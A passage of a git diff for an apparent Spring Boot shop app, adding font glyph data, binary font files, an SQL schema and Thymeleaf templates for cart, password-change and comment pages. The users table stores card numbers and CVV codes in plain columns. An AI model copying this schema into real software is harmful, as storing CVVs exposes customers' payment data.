+563T140 505V0H75V515Q75 559 90 595T131 658T194 699T275 714Q315 714 349 702T408 669T447 619T461 554Q461 527 453 502T430 457T397 423T356 403Q431 387 472 334T513 207Q513 156 493 118T437 52T351 11T238 -6V57Z" />
+<glyph unicode="&#xe0;" glyph-name="agrave" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263 530Q361
+530 417 475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173 51T222
+42ZM170 730H241L301 637L257 620L170 730Z" />
+<glyph unicode="&#xe1;" glyph-name="aacute" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263 530Q361
+530 417 475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173 51T222
+42ZM270 620L225 637L284 730H356L270 620Z" />
+<glyph unicode="&#xe2;" glyph-name="acircumflex" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263
+530Q361 530 417 475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173
+51T222 42ZM140 645L238 730H288L387 645L348 624L263 687L178 624L140 645Z" />
+<glyph unicode="&#xe3;" glyph-name="atilde" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263 530Q361
+530 417 475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173 51T222
+42ZM325 638Q302 638 286 644T255 657T227 671T197 678Q180 678 171 671T156 656T149 640T147 630H105Q105 635 108 650T122 682T150 710T196 723Q217 723 232 717T262 702T290 688T324 681Q343 681 354 688T372 704T379 720T381 730H423Q423 725 419 710T405 679T375
+651T325 638Z" />
+<glyph unicode="&#xe4;" glyph-name="adieresis" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263
+530Q361 530 417 475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173
+51T222 42ZM160 633V727H218V633H160ZM309 633V727H367V633H309Z" />
+<glyph unicode="&#xe5;" glyph-name="aring" horiz-adv-x="545" d="M206 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T94 265T163 297T251 309Q291 309 332 302T405 282V329Q405 398 366 438T258 479Q218 479 176 463T91 417L67 462Q168 530 263 530Q361
+530 417 475T473 323V88Q473 60 498 60V0Q481 -3 472 -3Q446 -3 432 10T416 46L414 87Q378 40 324 15T206 -10ZM222 42Q275 42 319 62T387 115Q396 124 400 134T405 154V239Q371 252 335 259T260 266Q188 266 143 236T98 157Q98 133 107 112T133 76T173 51T222
+42ZM189 665Q189 694 210 712T263 730Q295 730 316 712T337 665Q337 635 316 617T263 599Q231 599 210 617T189 665ZM263 703Q246 703 235 693T223 665Q223 648 234 637T263 626Q279 626 291 637T304 665Q304 682 292 692T263 703Z" />
+<glyph unicode="&#xe6;" glyph-name="ae" horiz-adv-x="932" d="M205 -10Q169 -10 138 2T83 37T46 88T33 152Q33 186 49 215T93 265T162 297T250 309Q285 309 320 304T384 289Q386 308 389 328T401 365Q391 419 354 449T257 479Q218 479 176 463T90 417L66 462Q169
+530 263 530Q328 530 374 503T443 426Q475 473 527 501T642 530Q699 530 746 509T828 451T882 365T902 260Q902 256 902 248T901 236H448Q451 194 468 159T512 97T574 57T648 42Q673 42 698 49T744 68T781 97T807 136L867 120Q855 91 833 68T782 27T718 0T645 -10Q576
+-10 521 21T430 105Q413 75 388 53T331 17T268 -3T205 -10ZM221 42Q275 42 319 62T387 115Q403 133 405 150Q395 170 390 196T384 246Q324 266 259 266Q187 266 142 236T97 157Q97 133 106 112T133 76T172 51T221 42ZM837 282Q834 325 818 360T775 422T715 462T641
+477Q601 477 567 463T507 422T466 360T448 282H837Z" />
+<glyph unicode="&#xe7;" glyph-name="ccedilla" horiz-adv-x="549" d="M223 -126Q237 -133 261 -138T311 -144Q368 -144 368 -109Q368 -89 355 -81T318 -73Q297 -73 274 -77T238 -87L280 -9Q227 -5 183 17T107 77T57 161T39 262Q39 317 58 366T111 451T194 509T300
+530Q374 530 429 497T512 406L446 385Q424 425 385 447T297 470Q257 470 223 454T163 411T123 345T108 262Q108 218 123 179T164 112T224 67T298 50Q323 50 347 57T393 76T429 105T450 139L517 119Q496 65 442 31T319 -9L293 -51Q302 -47 312 -46T331 -45Q366 -45
+386 -60T407 -106Q407 -140 381 -158T305 -176Q276 -176 251 -171T206 -157L223 -126Z" />
+<glyph unicode="&#xe8;" glyph-name="egrave" horiz-adv-x="587" d="M300 -10Q243 -10 196 11T113 70T59 157T39 262Q39 317 58 365T112 450T195 508T299 530Q356 530 403 509T485 450T538 365T557 263Q557 255 557 247T556 236H110Q113 194 129 159T172 97T231
+57T303 42Q328 42 353 49T399 68T437 97T463 136L522 120Q510 91 488 68T437 27T373 0T300 -10ZM492 288Q489 330 473 364T431 424T372 463T300 477Q262 477 228 463T169 424T128 364T109 288H492ZM204 730H275L335 637L291 620L204 730Z" />
+<glyph unicode="&#xe9;" glyph-name="eacute" horiz-adv-x="587" d="M303 620L258 637L317 730H389L303 620ZM300 -10Q243 -10 196 11T113 70T59 157T39 262Q39 317 58 365T112 450T195 508T299 530Q356 530 403 509T485 450T538 365T557 263Q557 255 557 247T556
+236H110Q113 194 129 159T172 97T231 57T303 42Q328 42 353 49T399 68T437 97T463 136L522 120Q510 91 488 68T437 27T373 0T300 -10ZM492 288Q489 330 473 364T431 424T372 463T300 477Q262 477 228 463T169 424T128 364T109 288H492Z" />
+<glyph unicode="&#xea;" glyph-name="ecircumflex" horiz-adv-x="587" d="M174 645L272 730H322L421 645L382 624L297 687L212 624L174 645ZM300 -10Q243 -10 196 11T113 70T59 157T39 262Q39 317 58 365T112 450T195 508T299 530Q356 530 403 509T485 450T538
+365T557 263Q557 255 557 247T556 236H110Q113 194 129 159T172 97T231 57T303 42Q328 42 353 49T399 68T437 97T463 136L522 120Q510 91 488 68T437 27T373 0T300 -10ZM492 288Q489 330 473 364T431 424T372 463T300 477Q262 477 228 463T169 424T128 364T109
+288H492Z" />
+<glyph unicode="&#xeb;" glyph-name="edieresis" horiz-adv-x="587" d="M193 633V727H251V633H193ZM342 633V727H400V633H342ZM300 -10Q243 -10 196 11T113 70T59 157T39 262Q39 317 58 365T112 450T195 508T299 530Q356 530 403 509T485 450T538 365T557 263Q557
+255 557 247T556 236H110Q113 194 129 159T172 97T231 57T303 42Q328 42 353 49T399 68T437 97T463 136L522 120Q510 91 488 68T437 27T373 0T300 -10ZM492 288Q489 330 473 364T431 424T372 463T300 477Q262 477 228 463T169 424T128 364T109 288H492Z" />
+<glyph unicode="&#xec;" glyph-name="igrave" horiz-adv-x="218" d="M75 0V521H143V0H75ZM16 730H87L147 637L103 620L16 730Z" />
+<glyph unicode="&#xed;" glyph-name="iacute" horiz-adv-x="218" d="M115 620L70 637L129 730H201L115 620ZM75 0V521H143V0H75Z" />
+<glyph unicode="&#xee;" glyph-name="icircumflex" horiz-adv-x="218" d="M-14 645L84 730H134L233 645L194 624L109 687L24 624L-14 645ZM75 0V521H143V0H75Z" />
+<glyph unicode="&#xef;" glyph-name="idieresis" horiz-adv-x="218" d="M5 633V727H63V633H5ZM154 633V727H212V633H154ZM75 0V521H143V0H75Z" />
+<glyph unicode="&#xf0;" glyph-name="eth" horiz-adv-x="602" d="M495 683L413 632Q456 590 484 545T528 454T552 364T559 277Q559 212 538 160T481 69T398 11T296 -10Q244 -10 198 9T117 61T62 138T42 233Q42 282 61 326T114 403T191 455T287 474Q354 474 408
+442T490 357Q480 420 452 482T361 606L249 536L227 567L333 632Q277 680 190 730H286Q341 697 386 658L473 713L495 683ZM111 232Q111 194 125 161T165 103T225 64T298 50Q338 50 373 65T434 107T475 167T490 241Q490 278 475 310T435 366T375 403T301 417Q262
+417 227 403T167 363T126 304T111 232Z" />
+<glyph unicode="&#xf1;" glyph-name="ntilde" horiz-adv-x="583" d="M513 0H445V291Q445 384 418 426T333 468Q303 468 273 457T218 426T172 379T143 319V0H75V521H137V403Q169 460 228 495T358 530Q401 530 431 514T479 469T505 398T513 305V0ZM358 638Q335 638
+319 644T288 657T260 671T230 678Q213 678 204 671T189 656T182 640T180 630H138Q138 635 141 650T155 682T183 710T229 723Q250 723 265 717T295 702T323 688T357 681Q376 681 387 688T405 704T412 720T414 730H456Q456 725 452 710T438 679T408 651T358 638Z"
+/>
+<glyph unicode="&#xf2;" glyph-name="ograve" horiz-adv-x="595" d="M297 -10Q240 -10 193 11T112 70T58 156T39 259Q39 314 58 363T112 449T194 508T297 530Q353 530 400 508T482 449T536 363T556 259Q556 205 537 156T484 70T402 12T297 -10ZM108 258Q108 214
+123 177T163 111T223 66T297 50Q336 50 370 66T431 111T472 178T487 260Q487 303 472 341T431 408T371 453T297 470Q258 470 224 454T164 408T123 341T108 258ZM205 730H276L336 637L292 620L205 730Z" />
+<glyph unicode="&#xf3;" glyph-name="oacute" horiz-adv-x="595" d="M303 620L258 637L317 730H389L303 620ZM297 -10Q240 -10 193 11T112 70T58 156T39 259Q39 314 58 363T112 449T194 508T297 530Q353 530 400 508T482 449T536 363T556 259Q556 205 537 156T484
+70T402 12T297 -10ZM108 258Q108 214 123 177T163 111T223 66T297 50Q336 50 370 66T431 111T472 178T487 260Q487 303 472 341T431 408T371 453T297 470Q258 470 224 454T164 408T123 341T108 258Z" />
+<glyph unicode="&#xf4;" glyph-name="ocircumflex" horiz-adv-x="595" d="M174 645L272 730H322L421 645L382 624L297 687L212 624L174 645ZM297 -10Q240 -10 193 11T112 70T58 156T39 259Q39 314 58 363T112 449T194 508T297 530Q353 530 400 508T482 449T536
+363T556 259Q556 205 537 156T484 70T402 12T297 -10ZM108 258Q108 214 123 177T163 111T223 66T297 50Q336 50 370 66T431 111T472 178T487 260Q487 303 472 341T431 408T371 453T297 470Q258 470 224 454T164 408T123 341T108 258Z" />
+<glyph unicode="&#xf5;" glyph-name="otilde" horiz-adv-x="595" d="M297 -10Q240 -10 193 11T112 70T58 156T39 259Q39 314 58 363T112 449T194 508T297 530Q353 530 400 508T482 449T536 363T556 259Q556 205 537 156T484 70T402 12T297 -10ZM108 258Q108 214
+123 177T163 111T223 66T297 50Q336 50 370 66T431 111T472 178T487 260Q487 303 472 341T431 408T371 453T297 470Q258 470 224 454T164 408T123 341T108 258ZM360 638Q337 638 321 644T290 657T262 671T232 678Q215 678 206 671T191 656T184 640T182 630H140Q140
+635 143 650T157 682T185 710T231 723Q252 723 267 717T297 702T325 688T359 681Q378 681 389 688T407 704T414 720T416 730H458Q458 725 454 710T440 679T410 651T360 638Z" />
+<glyph unicode="&#xf6;" glyph-name="odieresis" horiz-adv-x="595" d="M194 633V727H252V633H194ZM343 633V727H401V633H343ZM297 -10Q240 -10 193 11T112 70T58 156T39 259Q39 314 58 363T112 449T194 508T297 530Q353 530 400 508T482 449T536 363T556 259Q556
+205 537 156T484 70T402 12T297 -10ZM108 258Q108 214 123 177T163 111T223 66T297 50Q336 50 370 66T431 111T472 178T487 260Q487 303 472 341T431 408T371 453T297 470Q258 470 224 454T164 408T123 341T108 258Z" />
+<glyph unicode="&#xf7;" glyph-name="divide" horiz-adv-x="537" d="M239 399V490H298V399H239ZM239 74V164H298V74H239ZM67 254V311H470V254H67Z" />
+<glyph unicode="&#xf8;" glyph-name="oslash" horiz-adv-x="595" d="M93 -1L132 50Q88 88 64 142T39 259Q39 314 58 363T112 449T194 508T297 530Q335 530 369 520T432 491L455 523H502L461 469Q506 431 531 377T556 259Q556 205 537 156T484 70T402 12T297 -10Q259
+-10 225 0T161 28L139 -1H93ZM297 50Q336 50 370 66T431 111T472 178T487 260Q487 307 470 347T423 416L199 80Q243 50 297 50ZM108 258Q108 210 125 171T171 102L395 439Q350 470 297 470Q258 470 224 454T164 408T123 341T108 258Z" />
+<glyph unicode="&#xf9;" glyph-name="ugrave" horiz-adv-x="594" d="M238 -10Q153 -10 112 46T70 215V521H138V227Q138 50 259 50Q289 50 318 60T371 89T415 134T447 193V521H515V88Q515 60 539 60V0Q527 -2 520 -2T509 -2Q485 -1 470 15T455 58V118Q421 57 363
+24T238 -10ZM198 730H269L329 637L285 620L198 730Z" />
+<glyph unicode="&#xfa;" glyph-name="uacute" horiz-adv-x="594" d="M297 620L252 637L311 730H383L297 620ZM238 -10Q153 -10 112 46T70 215V521H138V227Q138 50 259 50Q289 50 318 60T371 89T415 134T447 193V521H515V88Q515 60 539 60V0Q527 -2 520 -2T509
+-2Q485 -1 470 15T455 58V118Q421 57 363 24T238 -10Z" />
+<glyph unicode="&#xfb;" glyph-name="ucircumflex" horiz-adv-x="594" d="M167 645L265 730H315L414 645L375 624L290 687L205 624L167 645ZM238 -10Q153 -10 112 46T70 215V521H138V227Q138 50 259 50Q289 50 318 60T371 89T415 134T447 193V521H515V88Q515 60
+539 60V0Q527 -2 520 -2T509 -2Q485 -1 470 15T455 58V118Q421 57 363 24T238 -10Z" />
+<glyph unicode="&#xfc;" glyph-name="udieresis" horiz-adv-x="594" d="M187 633V727H245V633H187ZM336 633V727H394V633H336ZM238 -10Q153 -10 112 46T70 215V521H138V227Q138 50 259 50Q289 50 318 60T371 89T415 134T447 193V521H515V88Q515 60 539 60V0Q527
+-2 520 -2T509 -2Q485 -1 470 15T455 58V118Q421 57 363 24T238 -10Z" />
+<glyph unicode="&#xfd;" glyph-name="yacute" horiz-adv-x="542" d="M105 -160Q113 -161 120 -161T135 -162Q153 -162 163 -157T184 -135T206 -86T242 0L15 521H85L278 63L457 521H522L252 -151Q241 -180 216 -201T146 -223Q136 -223 127 -223T105 -220V-160ZM285
+620L240 637L299 730H371L285 620Z" />
+<glyph unicode="&#xfe;" glyph-name="thorn" horiz-adv-x="603" d="M565 257Q564 203 544 154T490 67T409 7T309 -16Q254 -16 211 11T144 74V-213H75V710H144V434Q173 475 214 503T318 532Q376 532 421 508T499 444T548 355T565 257ZM495 258Q495 299 482 337T446
+405T389 452T315 470Q285 470 259 460T212 433T173 394T144 348V172Q144 148 160 125T200 85T253 58T308 47Q349 47 383 65T442 112T481 179T495 258Z" />
+<glyph unicode="&#xff;" glyph-name="ydieresis" horiz-adv-x="542" d="M105 -160Q113 -161 120 -161T135 -162Q153 -162 163 -157T184 -135T206 -86T242 0L15 521H85L278 63L457 521H522L252 -151Q241 -180 216 -201T146 -223Q136 -223 127 -223T105 -220V-160ZM175
+633V727H233V633H175ZM324 633V727H382V633H324Z" />
+<glyph unicode="&#x2013;" glyph-name="endash" horiz-adv-x="570" d="M65 241V304H504V241H65Z" />
+<glyph unicode="&#x2014;" glyph-name="emdash" horiz-adv-x="901" d="M65 241V304H836V241H65Z" />
+<glyph unicode="&#x2018;" glyph-name="quoteleft" horiz-adv-x="196" d="M124 730L107 624H131V521H64V624L89 730H124Z" />
+<glyph unicode="&#x2019;" glyph-name="quoteright" horiz-adv-x="190" d="M71 521L88 627H64V730H131V627L106 521H71Z" />
+<glyph unicode="&#x201a;" glyph-name="quotesinglbase" horiz-adv-x="225" d="M86 -104L103 0H80V102H146V0L121 -104H86Z" />
+<glyph unicode="&#x201c;" glyph-name="quotedblleft" horiz-adv-x="316" d="M124 730L107 624H131V521H64V624L89 730H124ZM245 730L228 624H252V521H185V624L210 730H245Z" />
+<glyph unicode="&#x201d;" glyph-name="quotedblright" horiz-adv-x="311" d="M71 521L88 627H64V730H131V627L106 521H71ZM192 521L209 627H185V730H252V627L227 521H192Z" />
+<glyph unicode="&#x201e;" glyph-name="quotedblbase" horiz-adv-x="343" d="M86 -104L103 0H80V102H146V0L121 -104H86ZM204 -104L221 0H198V102H264V0L239 -104H204Z" />
+<glyph unicode="&#x2022;" glyph-name="bullet" horiz-adv-x="351" d="M265 346Q265 308 239 282T176 256Q139 256 113 282T86 346Q86 364 93 380T112 408T141 428T176 435Q194 435 210 428T239 409T258 380T265 346Z" />
+<glyph unicode="&#x2039;" glyph-name="guilsinglleft" horiz-adv-x="352" d="M41 276L289 454V395L96 259L289 125V66L41 239V276Z" />
+<glyph unicode="&#x203a;" glyph-name="guilsinglright" horiz-adv-x="352" d="M312 239L63 66V125L256 259L63 395V454L312 276V239Z" />
+</font>
+</defs>
+</svg>
diff --git a/src/main/resources/static/fonts/raleway-v12-latin-regular.ttf b/src/main/resources/static/fonts/raleway-v12-latin-regular.ttf
new file mode 100644
index 0000000..8392a78
Binary files /dev/null and b/src/main/resources/static/fonts/raleway-v12-latin-regular.ttf differ
diff --git a/src/main/resources/static/fonts/raleway-v12-latin-regular.woff b/src/main/resources/static/fonts/raleway-v12-latin-regular.woff
new file mode 100644
index 0000000..af2f2b7
Binary files /dev/null and b/src/main/resources/static/fonts/raleway-v12-latin-regular.woff differ
diff --git a/src/main/resources/static/fonts/raleway-v12-latin-regular.woff2 b/src/main/resources/static/fonts/raleway-v12-latin-regular.woff2
new file mode 100644
index 0000000..eba29a9
Binary files /dev/null and b/src/main/resources/static/fonts/raleway-v12-latin-regular.woff2 differ
diff --git a/src/main/resources/tables.sql b/src/main/resources/tables.sql
new file mode 100644
index 0000000..607a2ac
--- /dev/null
+++ b/src/main/resources/tables.sql
@@ -0,0 +1,129 @@
+alter table comments 
+   drop constraint FK6uv0qku8gsu6x1r2jkrtqwjtn;
+
+alter table comments 
+   drop constraint FK8omq0tc18jd43bu5tjh6jvraq;
+
+alter table order_lines 
+   drop constraint FK1smc0s578t2oih21yn9hw6usr;
+
+alter table order_lines 
+   drop constraint FK5v1oeejtgtf2n3toppm3tkuhh;
+
+alter table orders 
+   drop constraint FK32ql8ubntj5uh44ph9659tiih;
+
+alter table products 
+   drop constraint FKtng6hvelpjyy7el0f5eq93nq4;
+ 
+drop table categories;
+drop table comments;
+drop table order_lines;
+drop table orders;
+drop table products;
+drop table users;
+
+create table categories (
+   category_id bigint not null,
+    description varchar(255) not null,
+    highlighted boolean,
+    icon varchar(255) not null,
+    name varchar(255) not null,
+    primary key (category_id)
+);
+
+create table comments (
+   comment_id bigint generated by default as identity,
+    rating integer not null,
+    text varchar(255) not null,
+    timestamp bigint not null,
+    product_id bigint not null,
+    user_id bigint not null,
+    primary key (comment_id)
+);
+
+create table order_lines (
+   order_line_id bigint generated by default as identity,
+    price integer,
+    order_id bigint not null,
+    product_id bigint not null,
+    primary key (order_line_id)
+);
+
+create table orders (
+   order_id bigint generated by default as identity,
+    address varchar(255) not null,
+    name varchar(255) not null,
+    price integer not null,
+    state varchar(255) not null,
+    timestamp bigint not null,
+    user_id bigint not null,
+    primary key (order_id)
+);
+
+create table products (
+   product_id bigint not null,
+    description varchar(255) not null,
+    icon varchar(255) not null,
+    name varchar(255) not null,
+    price integer not null,
+    sales integer not null,
+    total_comments integer not null,
+    total_score integer not null,
+    category bigint not null,
+    primary key (product_id)
+);
+
+create table users (
+   user_id bigint generated by default as identity,
+    address varchar(255) not null,
+    card varchar(255),
+    cvv integer,
+    expiration_month integer,
+    expiration_year integer,
+    email varchar(255) not null,
+    image varchar(255),
+    name varchar(255) not null,
+    password varchar(255) not null,
+    reset_password_token varchar(255),
+    primary key (user_id)
+);
+
+alter table categories 
+   add constraint UK_t8o6pivur7nn124jehx7cygw5 unique (name);
+
+alter table products 
+   add constraint UK_o61fmio5yukmmiqgnxf8pnavn unique (name);
+
+alter table users 
+   add constraint UK_6dotkott2kjsp8vw4d0m25fb7 unique (email);
+
+alter table comments 
+   add constraint FK6uv0qku8gsu6x1r2jkrtqwjtn 
+   foreign key (product_id) 
+   references products;
+
+alter table comments 
+   add constraint FK8omq0tc18jd43bu5tjh6jvraq 
+   foreign key (user_id) 
+   references users;
+
+alter table order_lines 
+   add constraint FK1smc0s578t2oih21yn9hw6usr 
+   foreign key (order_id) 
+   references orders;
+
+alter table order_lines 
+   add constraint FK5v1oeejtgtf2n3toppm3tkuhh 
+   foreign key (product_id) 
+   references products;
+
+alter table orders 
+   add constraint FK32ql8ubntj5uh44ph9659tiih 
+   foreign key (user_id) 
+   references users;
+
+alter table products 
+   add constraint FKtng6hvelpjyy7el0f5eq93nq4 
+   foreign key (category) 
+   references categories;
\ No newline at end of file
diff --git a/src/main/resources/templates/Cart.html b/src/main/resources/templates/Cart.html
new file mode 100644
index 0000000..9e85361
--- /dev/null
+++ b/src/main/resources/templates/Cart.html
@@ -0,0 +1,112 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+      <div th:replace="layout/Modal :: #modal-fragment"></div>
+
+      <script th:inline="javascript">
+         /*<![CDATA[*/
+         $(document).ready(function () {
+            doCreateRatings(true, 'sd');
+            $('table').DataTable({
+                paging: false,
+                ordering: false,
+                info: false,
+                filter: false
+            });
+            $('.remove-product-button').click(function (e) {
+               e.preventDefault();
+               var $btn = $(this);
+               var message = /*[[#{confirm.remove.product.from.cart}]]*/ DEFAULT_CONFIRM_MESSAGE;
+               doConfirm(message, function () {
+                  $btn.closest('form').submit();
+               });
+            });
+         });
+         /*]]>*/
+      </script>
+
+      <div class="container cart">
+
+         <div class="row w-100 mx-auto">
+            <div class="col-12 form-title">
+               <h2 th:text="#{shopping.cart.title}" ></h2>
+            </div>
+         </div>
+
+         <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+         <div class="row w-100 mx-auto" th:if="${session['shoppingCart'].products.size() == 0}">
+            <div class="col">
+               <div class="alert alert-warning">
+                  <span th:text="#{shopping.cart.empty}"></span>
+               </div>               
+            </div>
+         </div>
+
+         <div class="row w-100 mx-auto" th:if="${session['shoppingCart'].products.size() >0}">
+            <div class="col">
+               <form th:action="@{/orders/complete}" method="GET">
+                  <button class="btn btn-sm btn-success" type="submit">
+                     <i class="fa fa-shopping-cart"></i>&nbsp;
+                     <span th:text="#{shopping.cart.buy}"></span>
+                  </button>
+               </form>
+            </div>
+         </div>
+         
+         <div class="row w-100 ui-helper-margin-top mx-auto" th:if="${session['shoppingCart'].products.size() >0}">
+            <div class="col">
+               <table class="table table-striped dt-responsive w-100" >
+                  <thead>
+                     <tr>
+                        <th data-priority="2" data-orderable="false" data-order="false"></th>
+                        <th data-priority="1" th:text="#{product.name}"></th>
+                        <th data-priority="5" th:text="#{product.description}"></th>
+                        <th data-priority="4" th:text="#{product.category}"></th>
+                        <th data-priority="3" th:text="#{product.rating}"></th>
+                        <th data-priority="2" th:text="#{product.price}"></th>
+                        <th data-priority="1" data-orderable="false"><i class="fas fa-search"></i></th>
+                        <th data-priority="1" data-orderable="false"><i class="fas fa-trash"></i></th>
+                     </tr>
+                  </thead>
+                  <tbody>
+                     <tr th:each="product,status  : ${session['shoppingCart'].products}">
+                        <td class="align-middle"><i class="fas" th:classappend="${product.icon}"></i></td>
+                        <td class="align-middle">
+                           <span th:text="${product.name}" th:title="${product.description}"></span></td>
+                        <td th:text="${product.description}"></td>
+                        <td class="align-middle" th:text="${product.category.name}"></td>
+                        <td class="align-middle">
+                           <input type="text" class="rating-loading" th:value="${product.rating}"/>
+                        </td>
+                        <td class="align-middle"><span th:text="${product.price}"></span><span>&euro;</span></td>
+                        <td class="align-middle">
+                           <form method="GET" th:action="@{/products/{id}(id=${product.productId})}">
+                              <button class="btn btn-sm btn-success" type="submit">
+                                 <i class="fa fa-search"></i>
+                              </button>
+                           </form>
+                        </td>
+                        <td class="align-middle">
+                           <form method="POST" th:action="@{/products/{id}/removeFromCart(id=${product.productId})}">
+                              <button class="btn btn-sm btn-danger remove-product-button" type="button">
+                                 <i class="fa fa-trash"></i>&nbsp;
+                              </button>
+                           </form>
+                        </td>
+                     </tr>
+                  </tbody>
+               </table>
+            </div>
+         </div>
+
+      </div>
+
+      <div th:replace="layout/Footer :: #footer-fragment"></div>
+   </body>
+</html>
diff --git a/src/main/resources/templates/ChangePassword.html b/src/main/resources/templates/ChangePassword.html
new file mode 100644
index 0000000..1ab76f0
--- /dev/null
+++ b/src/main/resources/templates/ChangePassword.html
@@ -0,0 +1,112 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doConfigureFormValidation();
+         });
+      </script>
+
+      <div class="container changePassword">
+
+         <div class="row w-100 mx-auto">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{change.password.title}"></h2>
+                        </div>
+                     </div>
+
+                     <div th:replace="layout/Messages :: #messages-fragment"></div>
+
+                     <form th:object="${passwordForm}" class="form-horizontal toggle-disabled" method="POST">
+
+                        <div class="form-group row">
+                           <label for="password" class="col-3 text-right input-label-middle"
+                                  th:text="#{change.password.old.password}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-lock-open"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="oldPassword" name="oldPassword"
+                                     th:placeholder="#{login.input.password.placeholder}"
+                                     data-validation-error-msg-container="#input-old-password-error"
+                                     data-validation="length" data-validation-length="min4"
+                                     th:attr="data-validation-error-msg=#{login.input.password.validation}">
+                           </div>
+                        </div>
+
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-old-password-error"></div>
+                        </div>
+
+                        <div class="form-group row">
+                           <label for="password_confirmation" class="col-3 text-right input-label-middle"
+                                  th:text="#{change.password.new.password}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-lock"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password_confirmation" name="password_confirmation"
+                                     th:placeholder="#{profile.input.password.placeholder}"
+                                     data-validation-error-msg-container="#input-password-confirmation-error"
+                                     data-validation="length" data-validation-length="min4"
+                                     th:attr="data-validation-error-msg=#{profile.input.password.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-password-confirmation-error"></div>
+                        </div>
+
+                        <div class="form-group row">
+                           <label for="password" class="col-3 text-right input-label-middle"
+                                  th:text="#{profile.input.password.confirm}"></label>
+                           <div class="input-group col-8 col-sm-6">
+                              <div class="input-group-prepend">
+                                 <span class="input-group-text"><i class="fas fa-redo"></i></span>
+                              </div>
+                              <input type="password" class="form-control"
+                                     id="password" name="password"
+                                     th:placeholder="#{profile.input.password.confirm.placeholder}"
+                                     data-validation-error-msg-container="#input-password-error"
+                                     data-validation="confirmation"
+                                     th:attr="data-validation-error-msg=#{profile.input.password.confirm.validation}">
+                           </div>
+                        </div>
+                        <div class="form-group row d-none">
+                           <div class="col-3"></div>
+                           <div class="col-9 text-left" id="input-password-error"></div>
+                        </div>
+
+                        <div class="form-group row">
+                           <div class="col-3"></div>
+                           <div class="input-group col-9">
+                              <button type="submit" class="btn btn-primary" th:text="#{login.button}"></button>
+                           </div>
+                        </div>
+                     </form>
+
+                  </div>
+               </div>
+            </div>
+         </div>
+
+
+      </div>
+
+   </div>
+
+   <div th:replace="layout/Footer :: #footer-fragment"></div>
+</body>
+</html>
diff --git a/src/main/resources/templates/Comment.html b/src/main/resources/templates/Comment.html
new file mode 100644
index 0000000..f89fd80
--- /dev/null
+++ b/src/main/resources/templates/Comment.html
@@ -0,0 +1,67 @@
+<!DOCTYPE HTML>
+<html>
+
+   <header th:replace="layout/Includes :: #include-fragment"></header>
+
+   <body>
+      <div th:replace="layout/NavBar :: #navbar-fragment"></div>
+
+      <script>
+         $(document).ready(function () {
+             doConfigureFormValidation();
+             doCreateRatings(false, 'sm');
+         });
+      </script>
+      <div class="container register">
+
+         <div class="row w-100">
+            <div class="col col-padding">
+               <div class="card mx-auto bg-light center-block ui-helper-margin-top">
+                  <div class="card-body">
+                     <div class="row">
+                        <div class="col-12 form-title">
+                           <h2 th:text="#{comment.title} + ': ' + ${product.name} + ' (' + ${product.category.name} + ')'"></h2>
+                        </div>
+                     </div>
+
